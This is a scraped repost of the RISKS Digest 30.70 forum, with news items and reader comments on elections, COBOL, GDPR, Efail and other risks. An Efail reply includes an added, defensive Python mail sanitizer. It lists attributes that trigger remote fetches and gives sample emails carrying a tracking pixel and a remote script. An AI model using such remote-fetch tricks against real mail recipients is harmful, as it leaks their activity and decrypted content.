    Date: Tue, 22 May 2018 09:26:21 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Massachusetts ponders hiring a computer to grade MCAS essays.
    What could go wrong? (The Boston Globe)

    http://www.bostonglobe.com/metro/20...could-wrong/D7fX11PReUWzVsAAdqC1qN/story.html

    ------------------------------

    Date: Tue, 22 May 2018 09:18:13 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Grocery store censors cake with request for 'summa cum laude'
    (The Boston Globe)

    http://www.bostonglobe.com/news/nat...a-cum-laude/npFzLAzg2b7w54247o3MIO/story.html

    [I won't insult long-time RISKS readers with pointers to the predecessors
    of this item. There are too many. PGN]

    ------------------------------

    Date: Wed, 16 May 2018 07:47:04 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: The surprising return of the repo man (WashPo)

    New technology and bad auto loans mean more cars are being taken back.

    http://www.washingtonpost.com/busin...fcd30e-4d5a-11e8-af46-b1d6dc0d9bfe_story.html

    ------------------------------

    Date: Tue, 22 May 2018 15:59:15 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Trump feels presidential smartphone security is too inconvenient
    (Ars Technica)

    Report: President Trump clings to his Twitter phone, reluctant to allow
    security checks.

    http://arstechnica.com/information-...tial-smartphone-security-is-too-inconvenient/

    Security ... inconvenient. Who knew?

    ------------------------------

    Date: Sat, 19 May 2018 10:22:51 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Trump Jr. and Other Aides Met With Gulf Emissary Offering Help to
    Win Election (NY Times)

    NNSquad
    http://www.nytimes.com/2018/05/19/u...r-prince-zamel.html?smid=tw-nytimes&smtyp=cur

    Three months before the 2016 election, a small group gathered at Trump
    Tower to meet with Donald Trump Jr., the president's eldest son. One was
    an Israeli specialist in social media manipulation. Another was an
    emissary for two wealthy Arab princes. The third was a Republican donor
    with a controversial past in the Middle East as a private security
    contractor.

    ------------------------------

    Date: Thu, 17 May 2018 10:00:20 -0700
    From: "Mark E. Smith" <mym...@gmail.com>
    Subject: Re: Securing Elections (RISKS-30.69)

    PGN cites Bruce Schneier:

    "Elections serve two purposes. The first, and obvious, purpose is to
    accurately choose the winner. But the second is equally important: to
    convince the loser. To the extent that an election system is not
    transparently and auditably accurate, it fails in that second purpose.
    Our election systems are failing, and we need to fix them."

    Elections serve a third purpose, one which I think is much more important
    than accurately choosing a winner and convincing the loser: US elections are
    intended to make people think that they have a say in government when they
    don't.

    Some of the framers of the Constitution were concerned about the possibility
    of the "mob and rabble" eventually getting the vote and using it to obtain a
    voice in government. So they made no Constitutional provision that the
    popular vote had to be counted (Bush v. Gore 2000). They also took other
    precautions. They made Congress the sole judge of the "Elections, Returns,
    and Qualifications" of its Members, and the only venue where the loser of a
    rigged election could appeal. But by the time they file that appeal, the
    "winner" has usually already been sworn into office, and Congress doesn't
    like to remove sitting members, so if anyone is aware of an appeal that has
    been successful, I'd like very much to know about it.

    We are so accustomed to a losing candidate taking office, that it isn't even
    noteworthy these days. The Supreme Court can intervene to seat the loser, or
    the winner can concede and throw the election to the loser. In a democratic
    system, such events would result in a new election, not in handing over
    office to somebody who wasn't elected.

    These realizations and others led me to informally poll the groups of
    election integrity activists I was part of at that time, with shocking
    results. I asked if they would still vote if the only permissible voting
    machine was a flush toilet. Approximately 50% stated that they would
    continue to vote, even if they knew for a fact that their vote would not be
    counted and would be flushed away as soon as they cast their ballot. Some
    angrily accused me to trying to take away their precious right to vote, for
    which their ancestors had fought and died.

    So I repeated the poll online and got the same result. About 50% of voters
    appear to be concerned with casting their votes, not about whether their
    votes are actually counted, no less counted accurately. They associate
    democracy with elections, so they believe that if they vote, whether or not
    their votes are counted accurately (or at all), they are participating in
    democracy.

    If votes are not counted, or are not counted accurately, voters are not
    electing anyone. But for a political system to be called democratic, voters
    would have to have a way to hold their elected officials accountable. Our
    system does this by allowing voters to cast more uncounted, miscounted, or
    overruled ballots once the incumbent's term of office is over. So if someone
    is elected, whether legitimately or fraudulently, and then decides to
    destroy the country (perhaps by nuking a few cities to end the homelessness
    and poverty problems, or some other ill-conceived ventures), the voters can
    do nothing but wait until their term in office is over, if anyone has
    survived, to try to hold them "accountable" by "electing" another
    unaccountable official. There is no right of recall at the federal level,
    therefore no means of holding "elected" officials accountable in a timely
    way.

    With mail-in ballots, which seem to predominate these days, there is no
    chain-of-custody possible. The offices of election officials are closed to
    the public between the election and the certification, and official
    observers aren't always notified when votes are counted, so corrupt
    elections officials have plenty of time to manufacture phantom votes, stuff
    the electronic "ballot boxes," and manipulate the actual results to match
    the results they want. As for audits, you can't ask for an audit until after
    the election has been certified (election officials certify only that an
    election was held in accordance with law, not that it was accurate), by
    which time the fraudulent "winner" has usually already been sworn into
    office and cannot be removed except by Congress. Many Members of Congress,
    like Nancy Pelosi, believe that it is more important that constituents be
    represented, than that they be represented by the person they voted
    for. Members of Congress are very well aware that voters have no way to hold
    them accountable, so they see no difference between people being
    "represented" by candidates who will and candidates who won't actually
    represent their interests. Once you vote (and hopefully donate to the
    campaign war chests of a few billionaires), your job is done and the
    elections have been a success. People who vote believe, at a minimum, that
    there might be a slight chance that their vote could be counted and that
    someone willing to represent them might be elected, so the primary purpose
    of elections, to make people think that they have a voice in government when
    they don't, has been achieved.

    Even if we could somehow manage to get them, transparent, auditable
    elections wouldn't eliminate risks to democracy. Our system, under a
    Constitution where the votes don't have to be counted, the Supreme Court can
    intervene to change the outcome, and those elected can't be held
    accountable, isn't electoral democracy, it is electoral tyranny, and your
    vote is your consent.

    ------------------------------

    Date: Sat, 19 May 2018 11:56:43 -0400
    From: Kelly Bert Manning <bo...@freenet.carleton.ca>
    Subject: Re: Dark code (DW, RISKS-30.69)

    I never had any problem getting COBOL to interact with other languages, from
    PL/I to FORTRAN, C, and assembler. If you Read the Fine Manual and followed
    the guidance it worked even before IBM Language Environment united them into
    a single run time environment. Legacy COBOL didn't have function calls, but
    those could be replaced by a parameterized subroutine call with the output
    variables as named arguments in the call parameter list.

    At the 2014 IEEE International Conference on Software Maintenance and
    Evolution I was struck by the absence of any interest or work in applying
    the very effective techniques developed for refactoring C and Java code to
    COBOL. I would have thought that there is a huge market for something that
    can process legacy COBOL code and refactor it into COBOL or newer languages,
    recovering and improving the design along the way.

    COBOL is a relatively orthogonal language. There is usually only one
    obvious or builtin way to do something. In PL/I there are usually 10
    different ways, few of which give optimal performance. Once you have
    considered
        ADD GIN TO VERMOUTH GIVING MARTINI;
    there aren't a lot of other options beyond
        COMPUTE MARTINI = VERMOUTH + GIN;

    http://ieeexplore.ieee.org/xpl/mostRecentIssue.jsp?punumber=6969845

    Working with Honeywell COBOL was something of a challenge, because byte size
    varied from 4 to 9 bits, depending on the Data Type. That could give some
    surprising 4 bit to 8 or 9 bit text conversion results when Group moves were
    interpreted as text based moves of a number of bytes. Packed Decimal data
    fields were considered to be 4 bit text, with every 9th bit a slack bit to
    restore alignment on a 9 or 36 bit boundary on those 36 bit word
    machines. Going through an IBM structured EBCDIC, binary and decimal tape
    master file deciding how to convert series of bytes to an appropriate HIS
    COBOL ASCII, binary or decimal format, depending on the context and data
    segment prefix was challenging, but doable. Ditto for the reverse process
    creating a tape to send back to the IBM computer in the same data centre.

    ------------------------------

    Date: Mon, 21 May 2018 22:44:51 +1200
    From: "Richard O'Keefe" <rao...@gmail.com>
    Subject: Re: Dark Code (DW, RISKS-30.69)

    The article noted by Wendy Grossman says things like "COBOL has to evolve"
    and implies that interoperation with new systems is especially different.

    COBOL *has* evolved. The current standard is from 2014. If you want to
    interoperate with Java, there are COBOL compilers that do that (like Elastic
    COBOL). If you want to interoperate with .Net, there's NetCOBOL to do that.
    And since standard COBOL has been an OO language since 2002, those are
    better fits than you might think. Modern compilers are catching up with the
    standards, but it always takes time. What if you want to interoperate using
    XML or JSON? IBM's COBOL for z/OS, release 6.2 supports XML and has JSON
    PARSE and JSON GENERATE statements.

    Of course modern COBOL is still COBOL underneath and while I'm OK reading
    it, I would have to be paid large sums of money to write it. Though the
    various Eclipse plugins that exist for COBOL should make that a lot easier
    than it used to be.

    So if COBOL *has* evolved and *does* interoperate and *does* have modern
    development tools, what's the problem?

    Well, COBOL has evolved, for one thing. I rather liked the compatibility
    remark in the Brand X documentation: a certain aspect used to be
    incompatible with the standard, but the standard has changed, and now we are
    compatible. And COBOL interoperates: if you have a COBOL program that used
    DMS II or IMS adapting it to a different data base system won't be easy.
    There's one large COBOL system I'm aware of where out of (operating system,
    data base system, programming language) COBOL is the *best* known part
    today.

    As for training, COBOL is verbose in the extreme and the standards and
    reference materials combine long-windedness with less precision than I'm
    comfortable with, BUT it's really not that hard to learn. And if people
    succeeded in writing useful programs that are still running decades later,
    that says *something* positive about the language.

    I suspect the problems are mostly mundane ones of poor documentation,
    inadequate test sets, institutional knowledge lost when people resigned,
    retired, or died, all of which have nothing to do with the language.

    ------------------------------

    Date: Fri, 18 May 2018 16:45:12 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Fitness App Leads To Arrest For Attack On McLean Cyclist
    (McLean, VA Patch)

    http://patch.com/virginia/mclean/fitness-app-leads-arrest-attack-mclean-cyclist

    Not quite a risk to the user -- more a public service finding him as violent
    assailant. But more details would have been nice, e.g., how police
    identified tracker used, then person wearing it.

    ------------------------------

    Date: Sat, 19 May 2018 17:54:44 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: Man Is Charged With Hacking West Point and Government Websites (NYT)

    http://www.nytimes.com/2018/05/10/nyregion/hacker-west-point-nyc-comptroller.html

    The man, who is thought to have hacked thousands of sites around the world,
    was arrested in California and could face up to 21 years in prison.

    "But some social media watchers said they were still surprised at the speed
    with which the Santa Fe shooting descended into information warfare.
    Sampson said he watched the clock after the suspect was first named by
    police to see how long it would take for a fake Facebook account to be
    created in the suspect's name: less than 20 minutes."

    If, as a hypothetical, Facebook required formal authentication of identity
    for account creation, such as confirmation of applicant's existence via a
    national birth registry, bona fide biometric comparison, and revenue/tax
    authority check, fake users would approach zero. This assumes these
    credentials are not stolen, or these government entities are not
    man-in-the-middle attack subjects.

    Internet anonymity would become harder to achieve along with criticism and
    free discussion of important global, national, and local issues that
    anonymity often promotes.

    Authentication, in a democracy, appears strongest for convicted criminals
    and individuals possessing security clearances. Expense and the law
    forestall establishment of mandatory, nation-wide authentication
    identification franchise.

    Will future political expedience compel adoption? An informed electorate
    should possess the wisdom and exclusive right to decide on this ominous
    subject.

    ------------------------------

    Date: Sat, 19 May 2018 15:24:51 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: Fake Facebook accounts and online lies multiply in hours after
    Santa Fe school shooting (WashPo)

    It has become a familiar pattern in the all-too-common aftermath of American
    school shootings: A barrage of online misinformation, seemingly designed to
    cloud the truth or win political points. But some were still surprised at
    the speed with which the Santa Fe shooting descended into information
    warfare.

    http://www.washingtonpost.com/news/...iply-in-hours-after-santa-fe-school-shooting/

    [See also: Russian Trolls Instantly Spread Fake News Online About Alleged
    Santa Fe School Shooter (Dimitrios Pagourtzis),
    http://www.inquisitr.com/4905300/di...sian-trolls-facebook-santa-fe-school-shooter/
    PGN]

    ------------------------------

    Date: Thu, 17 May 2018 11:29:20 +0100
    From: "Wol's lists" <antl...@youngman.org.uk>
    Subject: Re: "Warning: Dangerous Fake Emails About Google Privacy Changes"
    (RISKS-30.69)

    I am to some extent involved (in that I have some minimal legal liability)
    in the implementation of the GDPR, and all I can say is that I
    whole-heartedly approve. In Europe we seem to have this belief - apparently
    unheard of to Americans - that openness and fair dealing is much better all
    round.

    The GDPR enshrines good practice in law. It merely forces organisations to
    do what they should have been doing anyway. It also outlaws a bunch of sharp
    practices - which is why it's causing so much grief because those sharp
    practices were also common practice.

    The law divides into two groups, data USERS and data SUBJECTS. It places an
    obligation on data users to obtain *informed* consent. It also places an
    obligation to have a *record* of such consent. Which is why you're getting
    all these emails and letters to opt back in.

    Because so many permissions were granted by data SUBJECTS who didn't realise
    that the data USER had kindly pre-ticked a bunch of permission boxes giving
    the data user permission to do pretty much anything they wanted to. This
    sharp practice is now illegal.

    It also reinforces the right of the data SUBJECT to have any data the data
    user holds about them to be corrected or deleted (subject to other legal
    constraints, of course).

    In summary, if you are a decent organisation (the law doesn't apply to
    individuals), doing things properly, and keeping a decent paper trail, this
    legislation is pretty much a non-event.

    Of course, this summary does not account for incompetent implementation of
    the directive by politicians (par for the course, sadly), or incompetent
    CxO's who don't understand the legislation (sadly also par for the
    course). And sadly also apparently true for the person in charge of the
    directive at my organisation :-(

    ------------------------------

    Date: Wed, 23 May 2018 12:47:09 -0700
    From: Yooly <nah...@yahoo.co.jp>
    Subject: Re: Not So Pretty: What You Need to Know About E-Fail and the PGP
    Flaw (EFF, RISKS-30.69)

    This is not a PGP flaw but a problem arising from using HTML in email, the
    consequence of a stupid choice made years ago. I had assumed nobody would
    bat an eye upon seeing the term "HTML" being mentioned in the same breath as
    "mail client", but fortunately I was proven wrong: Atlantic Magazine's May
    21, 2018, issue carries an article with the title "Email Is Dangerous", from
    which I quote the following:

    "Matt Blaze, an associate professor of computer and information science at
    the University of Pennsylvania, took to Twitter after the Efail announcement
    to say, 'I've long thought HTML email is the work of the devil, and now we
    have proof I was right. But did you people listen? You never listen.'"

    http://www.theatlantic.com/technology/archive/2018/05/email-is-dangerous/560780/

    Alternative URL, if the original URL for the article ends up broken in the message you read:
    http://shorturl.at/gltZ6

    Years ago, after someone had started using HTML with email, I tried to
    convince people to refrain from using software that inserted HTML into their
    messages, but this turned out to be a lost cause, so I have instead been
    focusing on protecting myself: my mail software reliably strips all
    JavaScript and HTML from messages before they end up in my Inbox - and I am
    still alive and manage to communicate via email for work and pleasure (who'd
    a'thunk?).
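
    The strip-before-delivery approach Yooly describes, as an added example
    that is not the contributor's own mail software and not code from the
    original digest: a Python function that keeps only the text/plain parts of
    a message, falls back to the visible text of an HTML part only when no
    plain part exists, and reports the remote references and script tags the
    discarded HTML carried, since a remote fetch is exactly the backchannel
    Efail's direct-exfiltration variant relied on. The two sample messages,
    the tracker.example, cdn.example and pay.example hostnames, and the
    function and class names are all constructed for the example.

```python
"""Added example, not the contributor's mail software: keep only the
text/plain parts of a message and audit what the discarded HTML would do.
Both sample messages below are constructed for this example."""
import email
from email import policy
from html.parser import HTMLParser

# Attribute values that make a rendering client fetch a remote resource; such
# a fetch is the backchannel Efail's direct-exfiltration variant relied on.
REMOTE_ATTRS = {"src", "href", "background", "poster", "data", "action"}


class HtmlAudit(HTMLParser):
    """Records remote references and <script> tags in an HTML part and
    collects its visible text for use as a plain-text fallback."""

    def __init__(self):
        super().__init__()
        self.remote_refs, self.script_tags = [], 0   # (tag, url) pairs; count
        self._text, self._skip = [], False   # _skip: inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip = True
            self.script_tags += 1 if tag == "script" else 0
        for name, value in attrs:
            url = (value or "").strip()
            if name in REMOTE_ATTRS and url.lower().startswith(("http:", "https:", "//")):
                self.remote_refs.append((tag, url))

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._skip = False

    def handle_data(self, data):
        if not self._skip:          # script/style bodies are not visible text
            self._text.append(data)

    def visible_text(self):
        return " ".join("".join(self._text).split())   # collapse whitespace


def sanitize_message(raw):
    """Text-only body of a raw RFC 5322 message plus an audit of what was
    discarded: text/plain parts are used verbatim, text/html is reduced to
    visible text only when no text/plain part exists, anything else is dropped."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    plain, html_text, dropped, refs, scripts = [], [], [], [], 0
    for part in msg.walk():
        if part.is_multipart():
            continue                      # containers carry no content
        ctype = part.get_content_type()
        if ctype == "text/plain":
            plain.append(part.get_content())
            continue
        dropped.append(ctype)             # attachments included
        if ctype == "text/html":
            audit = HtmlAudit()
            audit.feed(part.get_content())
            audit.close()
            refs.extend(audit.remote_refs)
            scripts += audit.script_tags
            html_text.append(audit.visible_text())
    return {
        "body": "\n".join(plain) if plain else "\n".join(html_text),
        "from_html_fallback": not plain and bool(html_text),
        "dropped_parts": dropped,
        "remote_refs": refs,
        "script_tags": scripts,
    }


# multipart/alternative whose HTML alternative carries a tracking pixel and a
# remote script (constructed sample; the hostnames are placeholders).
SAMPLE_ALTERNATIVE = b"""From: alice@example.test
Subject: constructed sample
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Meeting at 10.
--b1
Content-Type: text/html; charset="utf-8"

<html><body><p>Meeting at <b>10</b>.</p>
<img src="https://tracker.example/pixel?id=42" width="1" height="1">
<script src="https://cdn.example/x.js"></script>
</body></html>
--b1--
"""

# HTML-only message, so the visible-text fallback is used (constructed sample).
SAMPLE_HTML_ONLY = b"""From: alice@example.test
Content-Type: text/html; charset="utf-8"

<p>Invoice attached.</p> <style>p{color:red}</style> <a href="https://pay.example/i/7">Pay</a>
"""
```

    In a real delivery filter the "body" value is what reaches the inbox and
    the "remote_refs" and "script_tags" values are what you would log; the
    fallback path exists because an HTML-only message has no text/plain part
    to keep, and reducing it to visible text still drops every remote
    reference.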

    ------------------------------

    Date: Thu, 17 May 2018 11:09:41 -0400
    Subject: Re: Deadly Convenience: Keyless Cars and Their Carbon Monoxide Toll
    (NYT)

    I have such a car myself (not a Toyota, but another brand with "keyless"
    operation). It does have an audible and visual warning when I exit the
    running car and take the key with me. But, I've exited the car, so what good
    is the warning? I don't actually see and hear it until I get back into the
    car. What I do hear is the engine running, both before I exit and after I
    start walking. Was this model perhaps a hybrid that was in silent electric
    mode at the time? And if so, wouldn't a better check be to not re-start the
    engine without the keyfob sensed?

    ------------------------------

    Date: Fri, 18 May 2018 13:33:13 -0500
    From: Dimitri Maziuk <dma...@bmrb.wisc.edu>
    Subject: Re: Chinese GPS (RISKS-30.69)

    Nothing new there.

    Back in the USSR it was the subject of many jokes, e.g. a foreign spy asking
    a local about some landmark marked on his map that isn't there. The local
    answers "these maps are garbage, see that top-secret `nucular' missile plant
    over there? -- it's right next to that".

    ------------------------------

    Date: Sat, 19 May 2018 10:50:06 +0300
    From: Amos Shapir <amo...@gmail.com>
    Subject: Re: The risk from robot weapons (RISKS-30.69)

    During WWII, the Russians trained dogs to hide under tanks when they heard
    gunshots. Then they tied bombs to their backs and sent them to blow up
    German tanks. Or so was the plan.

    What the Russians did not take into account, was that the dogs were trained
    with Russian tanks, which used diesel, but the German tanks used gasoline,
    and smelled different. So when hearing gunshots, the dogs immediately ran
    under the nearest *Russian* tank.

    This tale is about natural intelligence, which we're supposed to understand.
    The problem with AI, especially *learning machines*, is that we can try to
    control what they do, but cannot control how they do it.

    So we never know, even when we get correct answers, whether the machine had
    found some logic path to the answer, or maybe the answer just *smells
    right*. In the latter case, we might be surprised when asking questions we
    do not know the right answer to.

    ------------------------------

    Date: Sun, 20 May 2018 09:42:48 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Will You Be My Emergency Contact Takes On a Whole New Meaning
    (The New York Times)

    http://www.nytimes.com/2018/05/17/h...html?rref=collection/sectioncollection/health

    "Will you be my emergency contact?

    "When you’re dating, the question is a sign that you’ve made it to the
    this-is-really-serious category. When you’re friends, it’s a sign that
    you’re truly beloved or truly responsible. And if you’re related, it may
    mean that you will now be entered into a medical study together so
    scientists can figure out if sinus infections or anxiety run in your
    family.

    "What? That's right. Researchers have begun experimenting with using
    emergency contacts gathered from medical records to build family trees
    that can be used to study the heritability of hundreds of different
    attributes, and possibly advance research into diseases and responses to
    medications."

    HIPAA-restricted information becomes patient-surrendered anonymized
    information for research purposes with a right-to-use disclosure form.
    Networks of contacts await discovery for correlation with other reference
    sources. The medical insurance industry should take note and enhance
    patient database surveillance activities.

    ------------------------------

    Date: Sat, 19 May 2018 17:56:02 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: This fertility doctor is pushing the boundaries of human reproduction
    -- with little regulation (WashPo)

    John Zhang produced a three-parent baby, implanted abnormal embryos and
    wants to help 60-year-old women have children.

    http://www.washingtonpost.com/natio...9105dc-1831-11e8-8b08-027a6ccb38eb_story.html

    ------------------------------

    Date: Sat, 19 May 2018 17:55:46 -0700
    From: Monty Solomon <mo...@roscom.com>
    Subject: As DIY Gene Editing Gains Popularity, `Someone Is Going to Get Hurt'
    (NYTimes)

    http://www.nytimes.com/2018/05/14/science/biohackers-gene-editing-virus.html

    After researchers created a virus from mail-order DNA, geneticists sound the alarm about the genetic tinkering carried out in garages and living rooms.

    ------------------------------

    Date: Tue, 5 May 2018 11:11:11 -0800
    From: RISKS-...@csl.sri.com
    Subject: Abridged info on RISKS (comp.risks)

    The ACM RISKS Forum is a MODERATED digest. Its Usenet manifestation is
    comp.risks, the feed for which is donated by panix.com as of June 2011.
    => SUBSCRIPTIONS: The mailman Web interface can be used directly to
    subscribe and unsubscribe:
    http://mls.csl.sri.com/mailman/listinfo/risks

    => SUBMISSIONS: to ri...@CSL.sri.com with meaningful SUBJECT: line that
    includes the string `notsp'. Otherwise your message may not be read.
    *** This attention-string has never changed, but might if spammers use it.
    => SPAM challenge-responses will not be honored. Instead, use an alternative
    address from which you never send mail where the address becomes public!
    => The complete INFO file (submissions, default disclaimers, archive sites,
    copyright policy, etc.) is online.
    <http://www.CSL.sri.com/risksinfo.html>
    *** Contributors are assumed to have read the full info file for guidelines!

    => OFFICIAL ARCHIVES: http://www.risks.org takes you to Lindsay Marshall's
    searchable html archive at newcastle:
    http://catless.ncl.ac.uk/Risks/VL.IS --> VoLume, ISsue.
    Also, ftp://ftp.sri.com/risks for the current volume
    or ftp://ftp.sri.com/VL/risks-VL.IS for previous VoLume
    If none of those work for you, the most recent issue is always at
    http://www.csl.sri.com/users/risko/risks.txt, and index at /risks-30.00
    Lindsay has also added to the Newcastle catless site a palmtop version
    of the most recent RISKS issue and a WAP version that works for many but
    not all telephones: http://catless.ncl.ac.uk/w/r
    ALTERNATIVE ARCHIVES: http://seclists.org/risks/ (only since mid-2001)
    <http://the.wiretapped.net/security/info/textfiles/risks-digest/>
    *** NOTE: If a cited URL fails, we do not try to update them. Try
    browsing on the keywords in the subject line or cited article leads.
    Apologies for what Office365 and SafeLinks have done to URLs. I have
    tried to extract the essence.
    ==> Special Offer to Join ACM for readers of the ACM RISKS Forum:
    <http://www.acm.org/joinacm1>

    ------------------------------

    End of RISKS-FORUM Digest 30.70
    ************************
     
  4. LakeGator

    Risks Digest 30.70

    RISKS List Owner

    May 26, 2018 7:09 PM

    Posted in group: comp.risks

    RISKS-LIST: Risks-Forum Digest Saturday 26 May 2018 Volume 30 : Issue 70

    ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
    Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

    ***** See last item for further information, disclaimers, caveats, etc. *****
    This issue is archived at <The Risks Digest> as
    <The Risks Digest>
    The current issue can also be found at
    <http://www.csl.sri.com/users/risko/risks.txt>

    Contents:
    Boy, 9, dies in accident involving motorized room partition at his
    Fairfax school (WashPo)
    Don't Put That in My Heart Until You're Sure It Really Works (NYT)
    "Ex-Intel security expert: This new Spectre attack can even
    reveal firmware secrets" (Liam Tung)
    "This malware is harvesting saved credentials in Chrome, Firefox
    browsers" (ZDNet)
    Student awarded $36,000 for remote execution flaw in Google App Engine
    (Charlie Osborne)
    "This cryptocurrency phishing attack uses new trick to drain wallets"
    (Danny Palmer)
    Ex-JPMorgan Chase Blockchain Duo Unveil New Startup Clovyr (Fortune)
    ICE abandons its dream of ‘extreme vetting’ software that could
    predict whether a foreign visitor would become a terrorist (WashPo)
    E-Mail Clients are Insecure, PGP and S/MIME 100% secure
    E-mail Encryption Tools Are No Longer Safe, Researchers Say (Fortune)
    Not So Pretty: What You Need to Know About E-Fail and the PGP Flaw (EFF)
    "T-Mobile bug let anyone see any customer's account details"
    (Zack Whittaker)
    "Senator wants to know how police can locate any phone in seconds without
    a warrant" (Zack Whittaker)
    US cell carriers are selling access to your real-time phone location data
    (Zack Whittaker)
    Hundreds of Apps Can Empower Stalkers to Track Their Victims (NYTimes)
    "Voice squatting attacks: Hacks turn Amazon Alexa, Google Home into
    secret eavesdroppers" (CSO Online)
    So, Umm, Google Duplex's Chatter Is Not Quite Human (Scientific American)
    Henry Kissinger Is Scared of 'Unstable' Artificial Intelligence (The Wrap)
    Service Meant to Monitor Inmates' Calls Could Track You, Too (NYT)
    Gunshot Sensors Pinpoint Destructive Fish Bombs (SciAm)
    Most GDPR emails unnecessary and some illegal, say experts (The Guardian)
    The Pentagon Has a Big Plan to Solve Identity Verification in Two Years
    (Defense One)
    Unplug Your Echo! (Ars Technica)
    FBI dramatically overstates how many phones they can't get into (WaPo)
    "Google to remove "secure" indicator from HTTPS pages on Chrome" (ZDNet)
    Google's Selfish Ledger is an unsettling vision of Silicon Valley social
    engineering (The Verge)
    "A flaw in a connected alarm system exposed vehicles to remote hacking"
    (ZDNet)
    Syrian hackers who tricked reporters indicted (WashPo)
    Cisco critical flaw warning: These 10/10 severity bugs need patching now
    (ZDNet)
    Is technology bringing history to life or distorting it? (WashPo)
    Massachusetts ponders hiring a computer to grade MCAS essays.
    What could go wrong? (The Boston Globe)
    Grocery store censors cake with request for 'summa cum laude'
    (The Boston Globe)
    The surprising return of the repo man (WashPo)
    Trump feels presidential smartphone security is too inconvenient
    (Ars Technica)
    Trump Jr. and Other Aides Met With Gulf Emissary Offering Help to Win
    Election (NY Times)
    Re: Securing Elections (Mark E. Smith)
    Re: Dark code (Kelly Bert Manning, Richard O'Keefe)
    Fitness App Leads To Arrest For Attack On McLean Cyclist (McLean VA Patch)
    Man Is Charged With Hacking West Point and Government Websites (NYT)
    Fake Facebook accounts and online lies multiply in hours after Santa Fe
    school shooting (WashPo)
    Re: "Warning: Dangerous Fake Emails About Google Privacy Changes" (Wol)
    Re: Not So Pretty: What You Need to Know About E-Fail and the PGP Flaw
    (Yooly)
    Re: Deadly Convenience: Keyless Cars and Their Carbon Monoxide Toll (NYT)
    Re: Chinese GPS (Dimitri Maziuk)
    Re: The risk from robot weapons (Amos Shapir)
    Will You Be My Emergency Contact Takes On a Whole New Meaning (NYT)
    This fertility doctor is pushing the boundaries of human reproduction
    -- with little regulation (WashPo)
    As DIY Gene Editing Gains Popularity, `Someone Is Going to Get Hurt'
    Abridged info on RISKS (comp.risks)

    ----------------------------------------------------------------------

    Date: Tue, 22 May 2018 09:31:51 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Boy, 9, dies in accident involving motorized room partition at his
    Fairfax school (WashPo)

    Boy, 9, dies in accident involving motorized room partition at his Fairfax school

    ------------------------------

    Date: Mon, 21 May 2018 19:30:25 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Don't Put That in My Heart Until You're Sure It Really Works
    (NYTimes)

    Opinion | Don’t Put That in My Heart Until You’re Sure It Really Works

    'The bar for approval of medical devices is too low. There is no reason we
    shouldn’t require, as we almost always do for drugs, a randomized
    placebo-controlled trial showing improvements in “hard” outcomes like
    mortality before approving them.

    'Unfortunately, the United States may soon make it even easier for medical
    devices to reach the patient’s bedside. The Food and Drug Administration is
    considering requiring less upfront research and instead adding increased
    oversight after a device has been introduced into the market. The argument
    is that this will spur technological innovation and perhaps help terminally
    ill patients. However, loosening regulations could extract a steep cost from
    patients and the health system.'

    Greater release frequency with less rigorous pre-production qualification
    criteria and test coverage is NOT a recipe for safe and viable embedded
    software stacks that drive these gizmos. Suppressing production defect
    escape potential is challenging. Proactive techniques that facilitate early
    and rapid software defect discovery capability -- such as continuous
    integration and high-speed regression -- are effective when capable test
    authors challenge software stack authors. Alas, industry (not just embedded
    medical implants, cars, cellphones, etc.) often economizes on qualification
    product life cycle stages. There are "too many bits" to test quickly and
    thoroughly. Governance decisions and gut judgment are sometimes applied with
    impunity.

    It appears that the FDA has gone rogue, and off-the-rails via regulatory
    capture. A business-friendly administration promoting "caveat emptor" as
    standard operating procedure also intensifies medical device implantation
    risks. Refer to "The Danger Within Us: America's Untested, Unregulated
    Medical Device Industry and One Man's Battle to Survive It" by Jeanne Lenzer
    for an exposé of the implantable medical device industry.

    If you are confronted with a "hard sell" to "go" for implantation, ask
    a few questions of your physician and the device salesperson:

    Are there any randomized control trials and non-industry funded studies that
    evaluate the candidate device's effectiveness in humans? Were the studies
    performed by a non-profit? Or a university? Does the entity reporting the
    study's results receive funding from the device manufacturer? Do any of the
    study's authors disclose industry ties? If so, a report that is published
    might possess skewed findings. Is the raw data from these studies available
    for inspection? If so, try to find a consultant to review it for you and
    render an opinion. Will the device manufacturer share their software and
    system test plans for inspection? If so, try to locate a person "skilled in
    the art of embedded software test" to evaluate the test plan, and the
    firmware test results released with the implanted device. Try to gain access
    to the manufacturer's defect tracking system to explore defect density and
    discovery rates and repair history.

    Does the device have a special mechanism to disable it, should it misbehave?
    If so, try to learn about how this is accomplished and ensure there are
    backup sources -- other physicians or facilities that possess this
    mechanism.

    How many implants have been performed in the past year? How many
    patient deaths occurred post-implantation? Never mind if the deaths
    were attributed to the device or not, find the raw count of deaths.

    For each post-implant death, was an FDA MAUDE report filed? How many of
    these reports were filed by medical practitioners? How many by the device
    manufacturer? Confront the salesperson to learn why, or if, there's a huge
    discrepancy between the number of deaths and the number of FDA MAUDE reports
    they or practitioners reported. That discrepancy is apparently a clue that
    the manufacturer is or has concealed important evidence about device
    capability or side-effects that can injure or kill you.

    Has the device been the subject of prior recalls? If so, why? Has the
    manufacturer been sued for product liability previously? Are they currently
    under litigation for liability? These questions can provide insight into
    their organization's maturity and ability to pro-actively act on
    lessons-learned.

    Is the device implantation under consideration being applied for "an
    off-label" application in your case? If so, why?

    ------------------------------

    Date: Fri, 18 May 2018 09:24:59 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Ex-Intel security expert: This new Spectre attack can even
    reveal firmware secrets" (Liam Tung)

